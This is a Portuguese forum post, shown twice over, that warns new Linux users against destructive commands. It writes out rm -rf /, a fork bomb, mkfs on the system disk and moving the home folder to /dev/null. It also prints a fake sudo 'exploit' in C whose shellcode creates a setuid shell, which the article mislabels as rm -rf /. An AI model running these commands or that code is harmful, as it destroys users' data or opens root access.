Tweet
O terminal é sem dúvida uma poderosa arma, feito para facilitar a nossa vida, assim como uma faca de cozinha que ajuda em muito na hora de cozinhar. Porém como uma faca em mãos erradas é sinal de perigo, assim é o terminal com o trio copiar-colar-enter.
Por: M4iir1c10
Introdução
Linux é poderoso e divertido. Quando se trata de algo com muito poder, vale lembrar o conselho do tio Ben ao jovem Peter Park:
"Com grandes poderes, vem grandes responsabilidades"
Quando se é novo no Linux, frequentemente procuramos obter ajuda de outros e quase a maioria dos conselhos que você receberá será na forma de alguns comandos como ps, top, modprobe, lspci.
Tenha cuidado quando você executar esses comandos, infelizmente existem alguns anti-Linux a serviço do mal, malucos invejosos que tentam enganar novos usuários com dicas e tutoriais falsos, como nesse fórum:
Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... * NÃO EXECUTE ESSES COMANDOS)
Se você seguir estas dicas e executar esses comandos, perderá todos os seus arquivos, e ninguém será culpado a não ser você. Esteja consciente do que você está fazendo!
Não faça de todas instruções como em uma receita de bolo, seguindo a risca sem saber o que está fazendo. Use as man pages, elas estão aí para isso (manuais do Linux, em um terminal digite: "man comando", o manual será mostrado na tela. EX: man mplayer).
Desta forma você aprenderá a aproveitar muito mais as opções que o Linux te dá.
Primeiro comando
Vamos começar. Repito, NÃO EXECUTE ESSES COMANDOS. Se você quiser testar, sugiro-lhe executá-los dentro de uma máquina virtual (VirtualBox).
1. O rei de todos os males:
# rm -rf /
P. O que faz um rm?
A. Remove um arquivo
P. O que é r?
A. Recursão. Isso significa que dentro de uma pasta, de outra pasta naquela pasta e assim por diante.
P. O que é f?
A. Force. Isso significa que você está dizendo para o comando: "Nunca me perguntar nada. Basta fazer o que eu mandar fazer".
P. O que é /?
A. Seu diretório raiz!
Veja o que o comando faz: recursivamente remove todos os arquivos dentro do seu diretório raiz sem chatear você - "Devo apagar isso, sim ou não?".
Existem várias versões do rm disponíveis, tais como:
# rm -rf .
# rm -rf *
Pouco conhecimento é perigoso!
Que tal isso? Como você faria para apagar todos os arquivos ocultos de uma pasta, sabendo que os arquivos ocultos no Linux começam com .? Você poderia pensar em um comando como esse:
# rm - .*
Nããããããoooooo!
Esse comando irá apagar todos os arquivos um nível acima do diretório atual.
[ame]http://www.youtube.com/watch?v=D4fzInlyYQo&feature=player_embedded[/ame]
Segundo, terceiro e quarto comandos
2. Como fazer um backup do seu diretório home ou algumas pastas? Nunca tente fazer qualquer coisa como:
# mv /home/seunome/* /dev/null
P. O que é mv?
A. Mover arquivos.
P. O que é /dev/null?
A. Nulo, não significa nada. Em outras palavras, é um buraco-negro.
Se você executar o comando acima ele irá mover todos os arquivos dentro do seu diretório home para um buraco-negro, Hasta la vista baby!
3. Terminal Linux não é um brinquedo, é algo para aprender e fazer coisas produtivas. Eu só queria avisar que você não deve escrever nada bobo e apertar ENTER como esta bobagem:
){:|:&};:
Esses rostinhos, que mais parecem aqueles usados em chat, parecem inofensivos, mas no terminal eles são comandos. O comando acima executa processos diferentes causando o congelamento de seu computador. Você obterá uma espécie de "Blue Screen of Death", "Tela Azul da Morte"! (usuários do Windows conhecem ela muito bem).
4. Que tal criar um sistema de arquivos do Linux?
# mkfs.ext3 /dev/sda
Os dados de seu disco rígido sumirão e nunca voltarão. Isso foi uma festa de despedida para seus documentos, você acabou de executar algo similar a um "format C:\*.*".
Quinto comando e finalização
5. Você já ouviu falar que os olhos podem mentir? Bem, às vezes. O que você verá no seguinte arquivo escrito em C por alguém alegando ser uma correção de uma falha de segurança do "sudo" é na verdade a raiz de todo o mal.
Então, esta é uma versão do código hexadecimal para "rm -rf / &". Isto faz nada mais nada menos que limpar o seu diretório raiz.
Estas são apenas algumas orientações para que você não seja enganado e pense que o Linux não presta, ele é muito poderoso e esse poder todo fica ao seu dispôr, por isso lembre-se do conselho do tio Ben.
Se você quiser aprender Linux, conquistar o poder sobre o seu computador, se divertir e ser produtivo, é preciso ter cuidado e partilhar o seu conhecimento.
Fonte: vivaoLinux
Postado Por: RedDeviL
Por: M4iir1c10
Introdução
Linux é poderoso e divertido. Quando se trata de algo com muito poder, vale lembrar o conselho do tio Ben ao jovem Peter Park:
"Com grandes poderes, vem grandes responsabilidades"
Quando se é novo no Linux, frequentemente procuramos obter ajuda de outros e quase a maioria dos conselhos que você receberá será na forma de alguns comandos como ps, top, modprobe, lspci.
Tenha cuidado quando você executar esses comandos, infelizmente existem alguns anti-Linux a serviço do mal, malucos invejosos que tentam enganar novos usuários com dicas e tutoriais falsos, como nesse fórum:
Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... * NÃO EXECUTE ESSES COMANDOS)
Se você seguir estas dicas e executar esses comandos, perderá todos os seus arquivos, e ninguém será culpado a não ser você. Esteja consciente do que você está fazendo!
Não faça de todas instruções como em uma receita de bolo, seguindo a risca sem saber o que está fazendo. Use as man pages, elas estão aí para isso (manuais do Linux, em um terminal digite: "man comando", o manual será mostrado na tela. EX: man mplayer).
Desta forma você aprenderá a aproveitar muito mais as opções que o Linux te dá.
Primeiro comando
Vamos começar. Repito, NÃO EXECUTE ESSES COMANDOS. Se você quiser testar, sugiro-lhe executá-los dentro de uma máquina virtual (VirtualBox).
1. O rei de todos os males:
# rm -rf /
P. O que faz um rm?
A. Remove um arquivo
P. O que é r?
A. Recursão. Isso significa que dentro de uma pasta, de outra pasta naquela pasta e assim por diante.
P. O que é f?
A. Force. Isso significa que você está dizendo para o comando: "Nunca me perguntar nada. Basta fazer o que eu mandar fazer".
P. O que é /?
A. Seu diretório raiz!
Veja o que o comando faz: recursivamente remove todos os arquivos dentro do seu diretório raiz sem chatear você - "Devo apagar isso, sim ou não?".
Existem várias versões do rm disponíveis, tais como:
# rm -rf .
# rm -rf *
Pouco conhecimento é perigoso!
Que tal isso? Como você faria para apagar todos os arquivos ocultos de uma pasta, sabendo que os arquivos ocultos no Linux começam com .? Você poderia pensar em um comando como esse:
# rm - .*
Nããããããoooooo!
Esse comando irá apagar todos os arquivos um nível acima do diretório atual.
[ame]http://www.youtube.com/watch?v=D4fzInlyYQo&feature=player_embedded[/ame]
Segundo, terceiro e quarto comandos
2. Como fazer um backup do seu diretório home ou algumas pastas? Nunca tente fazer qualquer coisa como:
# mv /home/seunome/* /dev/null
P. O que é mv?
A. Mover arquivos.
P. O que é /dev/null?
A. Nulo, não significa nada. Em outras palavras, é um buraco-negro.
Se você executar o comando acima ele irá mover todos os arquivos dentro do seu diretório home para um buraco-negro, Hasta la vista baby!
3. Terminal Linux não é um brinquedo, é algo para aprender e fazer coisas produtivas. Eu só queria avisar que você não deve escrever nada bobo e apertar ENTER como esta bobagem:
){:|:&};:Esses rostinhos, que mais parecem aqueles usados em chat, parecem inofensivos, mas no terminal eles são comandos. O comando acima executa processos diferentes causando o congelamento de seu computador. Você obterá uma espécie de "Blue Screen of Death", "Tela Azul da Morte"! (usuários do Windows conhecem ela muito bem).
4. Que tal criar um sistema de arquivos do Linux?
# mkfs.ext3 /dev/sda
Os dados de seu disco rígido sumirão e nunca voltarão. Isso foi uma festa de despedida para seus documentos, você acabou de executar algo similar a um "format C:\*.*".
Quinto comando e finalização
5. Você já ouviu falar que os olhos podem mentir? Bem, às vezes. O que você verá no seguinte arquivo escrito em C por alguém alegando ser uma correção de uma falha de segurança do "sudo" é na verdade a raiz de todo o mal.
Código:
...
#### NÃO SE ATREVA A COMPILAR ISSO E EXECUTAR ######
#### ESSE CÓDIGO LOCO FOI TIRADO DA SEGUINTE PAGINA ####
#### http://seclists.org/fulldisclosure/2007/Aug/0071.html ####
/*
* off by one ebp overwrite in sudo prompt parsing
function
* discovered by beyond security in 2007, thx ge
*
* to compile: gcc -pipe -o sobo sobo.c ; ./sobo
*
* please use responsibly! a patch has already been
sent
* upstream and a fix will be included in the next
sudo release
*
*/
#include <stdio.h>
#include <unistd.h>
#include <string.h>
#include <alloca.h>
#define SPROMPT "%u@%h> \\%"
#define shellcode esp
#define RETS_NUM 246
#define NOPS_NUM 116
char esp[] __attribute__ ((section(".text"))) /* e.s.p
release */
= "\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68"
"\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99"
"\xdf\x81\x68\x8d\x92\xdf\x54\x5e\xf7\x16\xf7"
"\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56"
"\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31"
"\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\x2f\x62\x69"
"\x6e\x2f\x73\x68\x00\x2d\x63\x00"
"cp -p /bin/sh /tmp/.beyond; chmod 4755
/tmp/.beyond;";
void fill (char *buff, int size, unsigned long val) {
unsigned long *ptr = (unsigned long *) buff;
for (size /= sizeof (unsigned long); size > 0;
size--) *ptr++ = val;
}
unsigned long get_sp (void) {
__asm__ ("lea esp, %eax");
}
char *exp (char nops_nums, char rets_nums, char
*shellcode) {
int size = strlen (SPROMPT) + nops_nums + rets_nums
+ strlen (shellcode);
unsigned char *nops = alloca (nops_nums);
unsigned char *rets = alloca (rets_nums);
unsigned long ret = get_sp ();
static char exp_buffer [8192];
/* ensure isatty() fails */
close (0); close (1); close (2);
fill (nops, (unsigned char) nops_nums, 0x90909090);
fill (rets, (unsigned char) rets_nums, ret);
if (size > sizeof (exp_buffer)) {
fprintf (stderr, "buffer is too small\n");
return NULL;
}
snprintf (exp_buffer, sizeof (exp_buffer),
"%s%s%s%s",
SPROMPT, nops, shellcode, rets);
return exp_buffer;
}
int main(int argv, char *argc[]) {
char *exploit = exp (NOPS_NUM, RETS_NUM, shellcode);
execl ("/usr/bin/sudo", "/usr/bin/sudo", "-b", "-p",
exploit, "/bin/false", NULL);
/* shellroot should await you @ "HISTFILE=/dev/null
/tmp/.beyond -p" */
return 0;
}
Estas são apenas algumas orientações para que você não seja enganado e pense que o Linux não presta, ele é muito poderoso e esse poder todo fica ao seu dispôr, por isso lembre-se do conselho do tio Ben.
Se você quiser aprender Linux, conquistar o poder sobre o seu computador, se divertir e ser produtivo, é preciso ter cuidado e partilhar o seu conhecimento.
Fonte: vivaoLinux
Postado Por: RedDeviL
Comment